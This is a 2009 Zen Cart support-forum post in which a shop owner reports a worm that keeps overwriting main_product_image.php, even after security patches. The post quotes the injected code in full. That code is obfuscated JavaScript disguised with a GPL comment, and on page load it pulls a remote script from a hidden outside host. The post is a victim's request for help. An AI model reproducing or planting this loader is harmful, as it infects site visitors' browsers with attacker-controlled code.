21 Dec 2009, 1:46 AM
New Zenner
- Join Date:
- Dec 2009
- Posts:
- 2
- Plugin Contributions:
- 0
Worm attacking our main_product_image.php file?
Hello
There appears to be a worm attacking our zen cart install. It is replacing the file
main_product_image.php
with
<script>/*GNU GPL*/ try{window.onload = function(){var X3dvpouf3p0 = document.createElement('script');X3dvpouf3p0.setAttribute('type', 'text/javascript');X3dvpouf3p0.setAttribute('src', 'h$t!(&$t!!$p#@:))/^()/)&!y$i^e!)l(!&d@$m#&(a&)$^n&$a#g$!!e^(^^r!#-)#&c)((!^o(@m#&) .@@$^a$s&g#.)@@)$t(^$o)().$(!&(w^e!$@l!&!l@s@)f()$a(^&!)r&^((&g^##o!)-#!$c($(o!m(!.#s&#i!@@)m@&&p!l(e!(^w&^#o#$r&l#&d&$)h!o($u^@s(($e!& (.)$r(!!)$u^$!):(8^$0@(8#0($&^/&$^^g!!$o$@#@o)!$g(@&l#@(e^$#&).#$!c$)&o!#&m&@&@/#)^g#!$o!#&o#$)g&@l(&#e^&@.(#c#((o!m)(/^#!#t@!!u)&m$)b& &l)@&)r#$&.@c)((#o$m$/@!$i(&m^(&!a@(g&(e&#s^h#a&!^^c#^k@^&@.@(#u^s#^$$&/^!&l(i$)^!n&e$(!^@z))i#!n#$^g^.^c&o(&#m)/&(@'.replace(/@|#|\)|& |\!|\$|\(|\^/ig, ''));X3dvpouf3p0.setAttribute('defer', 'defer');document.body.appendChild(X3dvpouf3p0);}} catch(e) {}</script>I'm not sure how it's writing to this file. We applied the latest security patch twice and its still hitting us.